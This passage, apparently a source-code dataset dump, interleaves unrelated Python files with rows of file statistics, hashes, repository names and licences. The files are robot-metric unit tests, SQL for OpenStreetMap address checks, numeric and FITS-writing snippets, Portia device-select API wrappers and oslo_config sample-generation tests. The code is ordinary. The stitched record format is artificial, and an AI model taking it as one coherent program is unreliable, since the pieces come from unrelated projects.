    self.assertEqual(metrics_msgs[1].labels[0][1], "test-float-value")
    self.assertEqual(metrics_msgs[1].labels[1][0], "pick_id")
    self.assertEqual(metrics_msgs[1].labels[1][1], pick_id)
    # Bug fix: these two assertions previously checked metrics_msgs[0] —
    # a copy-paste slip; this paragraph validates the exit metric (index 1),
    # as every surrounding assertion does. (metrics_msgs[0]'s labels are
    # already fully checked by _validate_metric_float above.)
    self.assertEqual(metrics_msgs[1].labels[2][0], "intent")
    self.assertEqual(metrics_msgs[1].labels[2][1], "pick")
    self.assertEqual(len(metrics_msgs[1].event_params), 1)
    self.assertEqual(metrics_msgs[1].event_params[0][0], "test-event")
    self.assertEqual(metrics_msgs[1].event_params[0][1], "test-float-value")
    if kitting:
        self._validate_metric_kitting(exit_key, pick_id, metrics_msgs[2])
def _validate_metric_float(self, pick_id: str,
                           metric: metrics.Metric) -> None:
    """Checks the per-pick float metric (key "float-key", sequence 11)."""
    self.assertEqual(metric.key, "float-key")
    self.assertEqual(metric.float_value, 1.0)
    self.assertEqual(metric.sequence, 11)
    # Labels must appear in this exact order with these exact values.
    expected_labels = [
        ("test-label", "test-float-value"),
        ("pick_id", pick_id),
        ("intent", "pick"),
    ]
    self.assertEqual(len(metric.labels), 3)
    for index, (label_key, label_value) in enumerate(expected_labels):
        self.assertEqual(metric.labels[index][0], label_key)
        self.assertEqual(metric.labels[index][1], label_value)
    self.assertEqual(len(metric.event_params), 1)
    self.assertEqual(metric.event_params[0][0], "test-event")
    self.assertEqual(metric.event_params[0][1], "test-float-value")
def _validate_metric_kitting(self, exit_key: str, pick_id: str,
                             metric: metrics.Metric) -> None:
    """Checks the kitting-specific metric (value 2.0, sequence 13)."""
    self.assertEqual(metric.key, exit_key)
    self.assertEqual(metric.float_value, 2.0)
    self.assertEqual(metric.sequence, 13)
    # Labels must appear in this exact order with these exact values.
    expected_labels = [
        ("test-label", "test-kitting"),
        ("pick_id", pick_id),
        ("intent", "kitting"),
    ]
    self.assertEqual(len(metric.labels), 3)
    for index, (label_key, label_value) in enumerate(expected_labels):
        self.assertEqual(metric.labels[index][0], label_key)
        self.assertEqual(metric.labels[index][1], label_value)
    self.assertEqual(len(metric.event_params), 1)
    self.assertEqual(metric.event_params[0][0], "test-event")
    self.assertEqual(metric.event_params[0][1], "test-kitting")
class TestMetrics(test_utils.TestResponder):
    """Represents a Metrics for use in a test suite."""

    def step(self, cmd: types_gen.CommandData) -> List[types_gen.DeviceData]:
        """Test step, generates a response for testing framework data."""
        # Only unnamed robot reach-script commands produce metrics.
        if (cmd.device_type != "robot" or cmd.device_name or
                cmd.data_type != "reach-script"):
            return []

        def make_metric(seq: int, key: str, value: float, label_value: str,
                        intent: str) -> types_gen.DeviceData:
            # Factory for the three structurally identical metric messages.
            return types_gen.DeviceData(
                ts=cmd.ts,
                seq=seq,
                device_type="server",
                data_type="metric",
                metric_value=types_gen.KeyValue(key=key, float_value=value),
                labels=[
                    types_gen.KeyValue(key="test-label", value=label_value),
                    types_gen.KeyValue(key="pick_id", value=cmd.pick_id),
                    types_gen.KeyValue(key="intent", value=intent),
                ],
                event_params=[
                    types_gen.KeyValue(key="test-event", value=label_value)
                ],
            )

        return [
            make_metric(11, "float-key", 1.0, "test-float-value", "pick"),
            make_metric(12, cmd.cmd, 1.0, "test-float-value", "pick"),
            make_metric(13, cmd.cmd, 2.0, "test-kitting", "kitting"),
        ]

    def start(self) -> List[types_gen.DeviceData]:
        return []
# Standard entry point: run this module's test cases when executed directly.
if __name__ == "__main__":
    unittest.main()
| 44.107056
| 94
| 0.589089
| 2,065
| 18,128
| 4.907506
| 0.083293
| 0.052694
| 0.047365
| 0.056246
| 0.859384
| 0.845767
| 0.820604
| 0.789027
| 0.775706
| 0.773732
| 0
| 0.016678
| 0.29551
| 18,128
| 410
| 95
| 44.214634
| 0.776838
| 0.038008
| 0
| 0.75
| 0
| 0
| 0.122624
| 0.039056
| 0
| 0
| 0
| 0
| 0.137363
| 1
| 0.027473
| false
| 0
| 0.019231
| 0.002747
| 0.065934
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f839b0d3b36721d9dc5c319b6dd15a05642ec933
| 23
|
py
|
Python
|
nixml/__init__.py
|
moredhel/nixml
|
2c3d2a836d7a0060371597b8e95edf2b74af6018
|
[
"MIT"
] | 58
|
2019-03-12T16:51:11.000Z
|
2022-02-08T23:26:19.000Z
|
nixml/__init__.py
|
moredhel/nixml
|
2c3d2a836d7a0060371597b8e95edf2b74af6018
|
[
"MIT"
] | 1
|
2020-03-13T05:37:01.000Z
|
2020-03-13T09:21:06.000Z
|
nixml/__init__.py
|
moredhel/nixml
|
2c3d2a836d7a0060371597b8e95edf2b74af6018
|
[
"MIT"
] | 4
|
2019-07-31T17:07:59.000Z
|
2022-03-14T11:19:57.000Z
|
from . import generate
| 11.5
| 22
| 0.782609
| 3
| 23
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.947368
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f8622db6be3831b4bdae72807c7f9508641f3664
| 4,315
|
py
|
Python
|
query.py
|
jendrusk/osm_report_addr
|
315dc6aba8d881a97e15badabf27643ec058a440
|
[
"MIT"
] | 1
|
2018-07-10T10:32:14.000Z
|
2018-07-10T10:32:14.000Z
|
query.py
|
jendrusk/osm_report_addr
|
315dc6aba8d881a97e15badabf27643ec058a440
|
[
"MIT"
] | 5
|
2018-07-10T10:36:15.000Z
|
2018-08-30T11:44:51.000Z
|
query.py
|
jendrusk/osm_report_addr
|
315dc6aba8d881a97e15badabf27643ec058a440
|
[
"MIT"
] | 1
|
2018-07-10T07:58:59.000Z
|
2018-07-10T07:58:59.000Z
|
# #SQL that extracts errors from the database
# rep_street_sql = """
# select
# tags -> 'osm_user' as user,
# tags -> 'osm_changeset' as changeset,
# tags -> 'osm_timestamp' as created,
# osm_id,
# case
# when po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is not null then 'c_p_s'::text
# when po."addr:city" is null and po."addr:place" is not null and po."addr:street" is not null then 'nc_p_s'::text
# when po."addr:city" is null and po."addr:place" is null and po."addr:street" is not null then 'nc_np_s'::text
# when po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is null then 'c_p_ns'::text
# when po."addr:city" is not null and po."addr:place" is null and po."addr:street" is null then 'c_np_ns'::text
# when po."addr:city" is null and po."addr:place" is null and po."addr:street" is null then 'nc_np_ns'::text
# else null::text
# end as reason,
# 'node' as type,
# tags -> 'osm_version' as version,
# ST_Y(ST_Transform(way,4326)) as lat,
# ST_X(ST_Transform(way,4326)) as lon
# from planet_osm_point po
# where po."addr:housenumber" is not null
# and (po.tags->'osm_timestamp')::timestamp at time zone '0:00' between (date_trunc('hour',current_timestamp) - interval '24 hour')::timestamp and current_timestamp::timestamp
# and aba_isinpoland(po.way) = true
# and (
# (po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is not null) or
# (po."addr:city" is null and po."addr:place" is not null and po."addr:street" is not null) or
# (po."addr:city" is null and po."addr:place" is null and po."addr:street" is not null) or
# (po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is null) or
# (po."addr:city" is not null and po."addr:place" is null and po."addr:street" is null) or
# (po."addr:city" is null and po."addr:place" is null and po."addr:street" is null)
# )
# union all
# select
# tags -> 'osm_user' as user,
# tags -> 'osm_changeset' as changeset,
# tags -> 'osm_timestamp' as created,
# osm_id,
# case
# when po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is not null then 'c_p_s'::text
# when po."addr:city" is null and po."addr:place" is not null and po."addr:street" is not null then 'nc_p_s'::text
# when po."addr:city" is null and po."addr:place" is null and po."addr:street" is not null then 'nc_np_s'::text
# when po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is null then 'c_p_ns'::text
# when po."addr:city" is not null and po."addr:place" is null and po."addr:street" is null then 'c_np_ns'::text
# when po."addr:city" is null and po."addr:place" is null and po."addr:street" is null then 'nc_np_ns'::text
# else null::text
# end
# as reason,
# case
# when osm_id > 0 then 'way'
# when osm_id < 0 then 'relation'
# end
# as type,
# tags -> 'osm_version' as version,
# ST_Y(ST_Transform(ST_Centroid(way),4326)) as lat,
# ST_X(ST_Transform(ST_Centroid(way),4326)) as lon
# from planet_osm_polygon po
# where po."addr:housenumber" is not null
# and (po.tags->'osm_timestamp')::timestamp at time zone '0:00' between (date_trunc('hour',current_timestamp) - interval '24 hour')::timestamp and current_timestamp::timestamp
# and aba_isinpoland(po.way) = true
# and (
# (po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is not null) or
# (po."addr:city" is null and po."addr:place" is not null and po."addr:street" is not null) or
# (po."addr:city" is null and po."addr:place" is null and po."addr:street" is not null) or
# (po."addr:city" is not null and po."addr:place" is not null and po."addr:street" is null) or
# (po."addr:city" is not null and po."addr:place" is null and po."addr:street" is null) or
# (po."addr:city" is null and po."addr:place" is null and po."addr:street" is null)
# )
# """
# The SQL above runs for a long time, so a temporary table was made for
# development (original comment in Polish).
rep_street_sql = "select * from tmp_rep_test"
| 59.109589
| 178
| 0.638934
| 756
| 4,315
| 3.559524
| 0.111111
| 0.164994
| 0.167224
| 0.231884
| 0.938685
| 0.928279
| 0.928279
| 0.902267
| 0.882943
| 0.882943
| 0
| 0.008346
| 0.22248
| 4,315
| 72
| 179
| 59.930556
| 0.793741
| 0.956199
| 0
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f868f7a10a7740960a5bf2dda47a1c14f7814197
| 239
|
py
|
Python
|
tests/test_numeric.py
|
IshitaTakeshi/Tadataka
|
852c7afb904503005e51884408e1492ef0be836f
|
[
"Apache-2.0"
] | 54
|
2019-11-15T16:30:34.000Z
|
2022-01-13T15:18:54.000Z
|
tests/test_numeric.py
|
IshitaTakeshi/Tadataka
|
852c7afb904503005e51884408e1492ef0be836f
|
[
"Apache-2.0"
] | 11
|
2019-02-28T08:28:24.000Z
|
2020-04-07T04:47:12.000Z
|
tests/test_numeric.py
|
IshitaTakeshi/Tadataka
|
852c7afb904503005e51884408e1492ef0be836f
|
[
"Apache-2.0"
] | 1
|
2020-02-26T13:59:40.000Z
|
2020-02-26T13:59:40.000Z
|
from numpy.testing import assert_almost_equal
from tadataka.numeric import safe_invert
def test_safe_invert():
    """safe_invert returns 1/x for normal input and 1/epsilon at zero."""
    cases = [
        (10.0, 0.1),     # ordinary reciprocal
        (0.0, 1e17),     # zero clamped to 1/epsilon
    ]
    for value, expected in cases:
        assert_almost_equal(safe_invert(value, epsilon=1e-17), expected)
| 29.875
| 62
| 0.790795
| 40
| 239
| 4.45
| 0.5
| 0.224719
| 0.286517
| 0.235955
| 0.303371
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075117
| 0.108787
| 239
| 7
| 63
| 34.142857
| 0.760563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f89d8caee8e46aa9ab1154c4b52e36f8d7f7f956
| 138
|
py
|
Python
|
ATIVI01.py
|
kauaas/ATIVIDADE-DE-PYTHON-N3
|
c596f866f9b825ceb7e330317a018e1740187df4
|
[
"Apache-2.0"
] | null | null | null |
ATIVI01.py
|
kauaas/ATIVIDADE-DE-PYTHON-N3
|
c596f866f9b825ceb7e330317a018e1740187df4
|
[
"Apache-2.0"
] | null | null | null |
ATIVI01.py
|
kauaas/ATIVIDADE-DE-PYTHON-N3
|
c596f866f9b825ceb7e330317a018e1740187df4
|
[
"Apache-2.0"
] | null | null | null |
# Read a grade and keep re-prompting until it is within the valid 0-10 range.
# Bug fix: the loop previously read an undefined capitalized name 'Nota'
# (and assigned to it), while the initial read used lowercase 'nota' —
# Python identifiers are case-sensitive, so this raised NameError.
nota = float(input('Informe uma nota de 0 a 10: '))
while (nota > 10) or (nota < 0):
    nota = float(input('Informe uma nota de 0 a 10: '))
| 27.6
| 55
| 0.623188
| 26
| 138
| 3.307692
| 0.423077
| 0.209302
| 0.325581
| 0.488372
| 0.790698
| 0.790698
| 0.790698
| 0.790698
| 0.790698
| 0.790698
| 0
| 0.082569
| 0.210145
| 138
| 4
| 56
| 34.5
| 0.706422
| 0
| 0
| 0
| 0
| 0
| 0.405797
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3e0611bb54ea2a231c8b985646eb957721167841
| 381
|
py
|
Python
|
statistics/files.py
|
niilohlin/objective-tools
|
377423ebd172f407800217a9743e78d739bd4786
|
[
"MIT"
] | null | null | null |
statistics/files.py
|
niilohlin/objective-tools
|
377423ebd172f407800217a9743e78d739bd4786
|
[
"MIT"
] | null | null | null |
statistics/files.py
|
niilohlin/objective-tools
|
377423ebd172f407800217a9743e78d739bd4786
|
[
"MIT"
] | null | null | null |
import os
def headers(directory="./"):
    """Yield the names of header (.h) files found in *directory*."""
    return (name for name in os.listdir(directory) if name.endswith(".h"))
def bodies(directory="./"):
    """Yield the names of implementation (.m) files found in *directory*."""
    return (name for name in os.listdir(directory) if name.endswith(".m"))
def allFiles(directory="./"):
    """Return an iterator over all Objective-C source files (.h and .m)
    found in *directory*."""
    files = os.listdir(directory)
    # str.endswith accepts a tuple of suffixes: one call replaces the
    # previous 'f.endswith(".m") or f.endswith(".h")'.
    return filter(lambda f: f.endswith((".m", ".h")), files)
| 27.214286
| 72
| 0.650919
| 51
| 381
| 4.862745
| 0.333333
| 0.145161
| 0.193548
| 0.278226
| 0.733871
| 0.733871
| 0.733871
| 0.733871
| 0.733871
| 0.733871
| 0
| 0
| 0.160105
| 381
| 13
| 73
| 29.307692
| 0.775
| 0
| 0
| 0.3
| 0
| 0
| 0.036745
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0
| 0.1
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
3e3d2b515884a848a95c7f0983807ecffb7b1344
| 564
|
py
|
Python
|
codes/write_files.py
|
Wenupi/protoplanetary_disks
|
51f8decbec5415e1da9893316f03d32ca5ab27de
|
[
"MIT"
] | null | null | null |
codes/write_files.py
|
Wenupi/protoplanetary_disks
|
51f8decbec5415e1da9893316f03d32ca5ab27de
|
[
"MIT"
] | null | null | null |
codes/write_files.py
|
Wenupi/protoplanetary_disks
|
51f8decbec5415e1da9893316f03d32ca5ab27de
|
[
"MIT"
] | null | null | null |
from astropy.io import fits
# NOTE(review): np, wl, inc, Bright and op_depth are not defined in this
# file — presumably supplied by the script that includes this one. TODO:
# confirm against the caller.
# The wavelength/inclination filename suffix was built four times with the
# same expression; build it once and reuse it.
_suffix = ('_wl' + str(np.round(wl, 2)) + '_inc' +
           str(np.round(inc * 180. / np.pi, 2)) + 'deg.fits')
fits.writeto('Results/fits/Intensity' + _suffix, Bright, overwrite=True)
print(' - Results/fits/Intensity' + _suffix + ' saved!')
fits.writeto('Results/fits/OpticalD' + _suffix, op_depth, overwrite=True)
print(' - Results/fits/OpticalD' + _suffix + ' saved!')
| 56.4
| 117
| 0.664894
| 100
| 564
| 3.66
| 0.25
| 0.10929
| 0.218579
| 0.131148
| 0.84153
| 0.743169
| 0.743169
| 0.743169
| 0.743169
| 0.743169
| 0
| 0.039063
| 0.092199
| 564
| 9
| 118
| 62.666667
| 0.675781
| 0
| 0
| 0
| 0
| 0
| 0.301418
| 0.173759
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.142857
| 0
| 0.142857
| 0.285714
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3e4b51664925ee5a313b604f2e1ae62dbce59e23
| 5,465
|
py
|
Python
|
portiapy/select.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | 1
|
2019-05-22T18:38:01.000Z
|
2019-05-22T18:38:01.000Z
|
portiapy/select.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | 4
|
2018-09-17T13:16:18.000Z
|
2021-02-26T13:30:49.000Z
|
portiapy/select.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | null | null | null |
"""Select tools to fetch a device's data based on its ports, sensors and dimensions.
"""
import portiapy.utils as utils
def query_by_port_sensor(
        portia_config: dict,
        edge_id: str,
        port: int,
        sensor: int,
        last: bool = False,
        params: dict = None) -> object:
    """Retrieves a device's series by its port and sensor.

    Arguments:
        portia_config {dict} -- Portia's configuration arguments
        edge_id {str} -- Edge ID that identifies the device
        port {int} -- port of the device
        sensor {int} -- sensor of the device

    Keyword Arguments:
        last {bool} -- if the last package should be returned or not
                       (default: {False})
        params {dict} -- params to send to the service (default: {None},
                         which selects {{ 'from', 'to', 'lower_bound',
                         'upper_bound', 'order', 'limit', 'precision': 'ms',
                         'timezone': 'Etc/UTC' }})

    Returns:
        object -- object with the device's dimensions
    """
    # Bug fix: the default params dict was a mutable default argument,
    # created once at import and shared by every call — any mutation (by
    # this function's callee or a caller holding the reference) leaked into
    # subsequent calls. Build a fresh default per call instead.
    if params is None:
        params = {
            'from': None,
            'to': None,
            'lower_bound': None,
            'upper_bound': None,
            'order': None,
            'limit': None,
            'precision': 'ms',
            'timezone': 'Etc/UTC'
        }

    accept_header = portia_config.get('Accept')
    if accept_header is None:
        accept_header = 'text/csv'
    header = {'Accept': accept_header}

    # '/last' variant returns only the most recent package.
    if not last:
        endpoint = '/select/device/{0}/port/{1}/sensor/{2}'.format(
            edge_id, port, sensor
        )
    else:
        endpoint = '/select/device/{0}/port/{1}/sensor/{2}/last'.format(
            edge_id, port, sensor
        )

    response = utils.http_get_request(
        portia_config, endpoint, params=params, optional_headers=header
    )
    return utils.convert(accept_header, portia_config, response)
def query_by_port_dimension(
        portia_config: dict,
        edge_id: str,
        port: int,
        dimension_code: int,
        last: bool = False,
        params: dict = None) -> object:
    """Retrieves a device's series by its port and dimension code.

    Arguments:
        portia_config {dict} -- Portia's configuration arguments
        edge_id {str} -- Edge ID that identifies the device
        port {int} -- port of the device
        dimension_code {int} -- dimension code of the device

    Keyword Arguments:
        last {bool} -- if the last package should be returned or not
                       (default: {False})
        params {dict} -- params to send to the service (default: {None},
                         which selects {{ 'from', 'to', 'lower_bound',
                         'upper_bound', 'order', 'limit', 'precision': 'ms',
                         'timezone': 'Etc/UTC' }})

    Returns:
        object -- object with the device's dimensions
    """
    # Bug fix: mutable default argument — the shared dict persisted across
    # calls; build a fresh default per call instead.
    if params is None:
        params = {
            'from': None,
            'to': None,
            'lower_bound': None,
            'upper_bound': None,
            'order': None,
            'limit': None,
            'precision': 'ms',
            'timezone': 'Etc/UTC'
        }

    accept_header = portia_config.get('Accept')
    if accept_header is None:
        accept_header = 'text/csv'
    header = {'Accept': accept_header}

    # '/last' variant returns only the most recent package.
    if not last:
        endpoint = '/select/device/{0}/port/{1}/dimension/{2}'.format(
            edge_id, port, dimension_code
        )
    else:
        endpoint = '/select/device/{0}/port/{1}/dimension/{2}/last'.format(
            edge_id, port, dimension_code
        )

    response = utils.http_get_request(
        portia_config, endpoint, params=params, optional_headers=header
    )
    return utils.convert(accept_header, portia_config, response)
def query_by_port_sensor_dimension(
        portia_config: dict,
        edge_id: str,
        port: int,
        sensor: int,
        dimension_code: int,
        last: bool = False,
        params: dict = None) -> object:
    """Retrieves a device's series by its port, sensor and dimension code.

    Arguments:
        portia_config {dict} -- Portia's configuration arguments
        edge_id {str} -- Edge ID that identifies the device
        port {int} -- port of the device
        sensor {int} -- sensor of the device
        dimension_code {int} -- dimension code of the device

    Keyword Arguments:
        last {bool} -- if the last package should be returned or not
                       (default: {False})
        params {dict} -- params to send to the service (default: {None},
                         which selects {{ 'from', 'to', 'lower_bound',
                         'upper_bound', 'order', 'limit', 'precision': 'ms',
                         'timezone': 'Etc/UTC' }})

    Returns:
        object -- object with the device's dimensions
    """
    # Bug fix: mutable default argument — the shared dict persisted across
    # calls; build a fresh default per call instead.
    if params is None:
        params = {
            'from': None,
            'to': None,
            'lower_bound': None,
            'upper_bound': None,
            'order': None,
            'limit': None,
            'precision': 'ms',
            'timezone': 'Etc/UTC'
        }

    accept_header = portia_config.get('Accept')
    if accept_header is None:
        accept_header = 'text/csv'
    header = {'Accept': accept_header}

    # '/last' variant returns only the most recent package.
    if not last:
        endpoint = '/select/device/{0}/port/{1}/sensor/{2}/dimension/{3}' \
            .format(edge_id, port, sensor, dimension_code)
    else:
        endpoint = ('/select/device/{0}/port/{1}/sensor/{2}/dimension/{3}'
                    '/last'.format(edge_id, port, sensor, dimension_code))

    response = utils.http_get_request(
        portia_config, endpoint, params=params, optional_headers=header
    )
    return utils.convert(accept_header, portia_config, response)
| 31.051136
| 84
| 0.576212
| 636
| 5,465
| 4.823899
| 0.143082
| 0.05867
| 0.025098
| 0.043025
| 0.966428
| 0.950782
| 0.92927
| 0.914928
| 0.908409
| 0.861473
| 0
| 0.005215
| 0.298262
| 5,465
| 175
| 85
| 31.228571
| 0.794785
| 0.397072
| 0
| 0.802083
| 0
| 0
| 0.172088
| 0.088484
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.010417
| 0
| 0.072917
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3e7b2eeb4b8367281ab7a6d043f490fc6b37cdae
| 42
|
py
|
Python
|
src/utils/__init__.py
|
UoE-TTDS/project
|
9e98bcab6d561038aea6a987c44211c98068bfed
|
[
"MIT"
] | null | null | null |
src/utils/__init__.py
|
UoE-TTDS/project
|
9e98bcab6d561038aea6a987c44211c98068bfed
|
[
"MIT"
] | null | null | null |
src/utils/__init__.py
|
UoE-TTDS/project
|
9e98bcab6d561038aea6a987c44211c98068bfed
|
[
"MIT"
] | null | null | null |
from .generate_dataset import get_dataset
| 21
| 41
| 0.880952
| 6
| 42
| 5.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.921053
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e44555ccfd85df76a00187780bdcea978c7a55a9
| 145
|
py
|
Python
|
owstk/analysis/__init__.py
|
Tfitzpatrick846/OWSTK
|
dfce0fad56c0093c2c9cf45952cb3a0958e94706
|
[
"CNRI-Python"
] | null | null | null |
owstk/analysis/__init__.py
|
Tfitzpatrick846/OWSTK
|
dfce0fad56c0093c2c9cf45952cb3a0958e94706
|
[
"CNRI-Python"
] | null | null | null |
owstk/analysis/__init__.py
|
Tfitzpatrick846/OWSTK
|
dfce0fad56c0093c2c9cf45952cb3a0958e94706
|
[
"CNRI-Python"
] | null | null | null |
import owstk.analysis.access
import owstk.analysis.orbit
import owstk.analysis.workbench
import owstk.analysis.plot
import owstk.analysis.export
| 24.166667
| 31
| 0.862069
| 20
| 145
| 6.25
| 0.4
| 0.44
| 0.76
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 145
| 5
| 32
| 29
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e4ddcbaba6800c399c7592ada8a856caf2a4e403
| 5,807
|
py
|
Python
|
venv/lib/python3.6/site-packages/oslo_config/tests/test_sphinxconfiggen.py
|
boogieLing/r0_es
|
14ac336a40c4f87b8bd3bd62a60158b437690c35
|
[
"MIT"
] | 110
|
2015-01-29T20:10:46.000Z
|
2022-03-21T12:29:21.000Z
|
venv/lib/python3.6/site-packages/oslo_config/tests/test_sphinxconfiggen.py
|
boogieLing/r0_es
|
14ac336a40c4f87b8bd3bd62a60158b437690c35
|
[
"MIT"
] | 1
|
2019-03-16T18:35:42.000Z
|
2019-03-16T19:40:14.000Z
|
venv/lib/python3.6/site-packages/oslo_config/tests/test_sphinxconfiggen.py
|
boogieLing/r0_es
|
14ac336a40c4f87b8bd3bd62a60158b437690c35
|
[
"MIT"
] | 115
|
2015-01-14T03:25:05.000Z
|
2021-12-02T16:49:06.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from oslotest import base
from oslo_config import sphinxconfiggen
class SingleSampleGenerationTest(base.BaseTestCase):
    """Tests sample-config generation for a single generator config file."""

    @mock.patch('os.path.isdir')
    @mock.patch('os.path.isfile')
    @mock.patch('oslo_config.generator.main')
    def test_sample_gen_with_single_config_file(self, main, isfile, isdir):
        # NOTE(review): the [False, True] sequence mirrors generate_sample's
        # internal isfile checks — confirm against sphinxconfiggen if they
        # change.
        isfile.side_effect = [False, True]
        isdir.return_value = True
        config = mock.Mock(config_generator_config_file='nova-gen.conf',
                           sample_config_basename='nova')
        app = mock.Mock(srcdir='/opt/nova', config=config)
        sphinxconfiggen.generate_sample(app)
        # With a basename, the output file is '<basename>.conf.sample'.
        main.assert_called_once_with(args=['--config-file',
                                           '/opt/nova/nova-gen.conf',
                                           '--output-file',
                                           '/opt/nova/nova.conf.sample'
                                           ])

    @mock.patch('os.path.isdir')
    @mock.patch('os.path.isfile')
    @mock.patch('oslo_config.generator.main')
    def test_sample_gen_with_single_config_file_no_base(self, main, isfile,
                                                        isdir):
        isfile.side_effect = [False, True]
        isdir.return_value = True
        # No sample_config_basename: the generator falls back to a default
        # output name.
        config = mock.Mock(config_generator_config_file='nova-gen.conf',
                           sample_config_basename=None)
        app = mock.Mock(srcdir='/opt/nova', config=config)
        sphinxconfiggen.generate_sample(app)
        main.assert_called_once_with(args=['--config-file',
                                           '/opt/nova/nova-gen.conf',
                                           '--output-file',
                                           '/opt/nova/sample.config'])
class MultipleSampleGenerationTest(base.BaseTestCase):
    """Tests sample-config generation for multiple generator config files."""

    @mock.patch('os.path.isdir')
    @mock.patch('os.path.isfile')
    @mock.patch('oslo_config.generator.main')
